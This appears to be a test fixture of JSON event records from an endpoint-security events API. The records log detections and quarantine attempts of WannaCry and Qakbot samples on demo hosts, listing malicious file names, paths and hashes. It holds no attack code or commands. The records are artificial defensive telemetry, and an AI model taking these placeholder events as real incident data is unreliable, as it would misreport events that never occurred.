+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 